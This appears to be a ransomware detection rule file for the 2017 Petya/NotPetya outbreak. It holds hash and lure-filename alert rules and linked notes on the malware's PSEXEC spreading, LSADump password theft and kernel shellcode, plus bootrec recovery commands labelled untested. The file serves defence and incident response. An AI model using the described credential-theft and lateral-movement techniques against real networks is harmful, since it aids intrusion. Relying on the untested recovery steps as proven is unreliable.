alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5ee4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128cdc8; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)
alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)
*********** Has sysinternal utilities signature
https://twitter.com/ppeepuppy/status/879706271535972353
*********** Uses the GetExtendedTcpTable function to get a list of available endpoints
https://twitter.com/pjcampbe11/status/879709929073979392
*********** List of extensions targeted
https://twitter.com/MrCarlMcDade/status/879706580127809536
*********** Indicates possible usage of PSEXEC; on Windows that means the admin$ and c$ shares.
https://twitter.com/rikvduijn/status/879726410201526272
*********** It is confirmed that the sample 027cc... contains PSEXEC:
https://twitter.com/NVISO_Labs/status/879724733696274432
*********** Friends in Ukraine are telling me this helps to recover from Petya (untested):
https://twitter.com/msuiche/status/879722894997278720
bootrec /RebuildBcd
bootrec /fixMbr
bootrec /fixboot
*********** Fix suggest by @MrAdz350
If you can boot to a Windows ISO prior to the first reboot, you can use the bootrec tool to prevent MBR overwriting, as per https://neosmart.net/wiki/fix-mbr
*********** Petya— Enhanced WannaCry? What we know so far.
https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb
*********** Found evidence of post-kernel-exploitation too: IA32_SYSENTER_EIP after decoding kernel shellcode
https://twitter.com/msuiche/status/879713211368525824
*********** #Petya uses long #sleep functions: if infected, you have 30-40 minutes to turn off your computer to save it from the ransom.
https://twitter.com/GroupIB_GIB/status/879736598535032832
*********** #Petya uses LSADump to get admin passwords and infect the whole network. There is no need for #EternalBlue-vulnerable PCs.
https://twitter.com/GroupIB_GIB/status/879772068300165120
*********** Explanation from Microsoft
https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/
*********** Information about MBRFilter
http://blog.talosintelligence.com/2016/10/mbrfilter.html
https://www.talosintelligence.com/mbrfilter
https://www.youtube.com/watch?v=nLyOi75Wu3A
*********** Recent news from THN/Threatpost/Blogs:
https://vulners.com/search?query=(Petya%20OR%20notPetya)%20order:published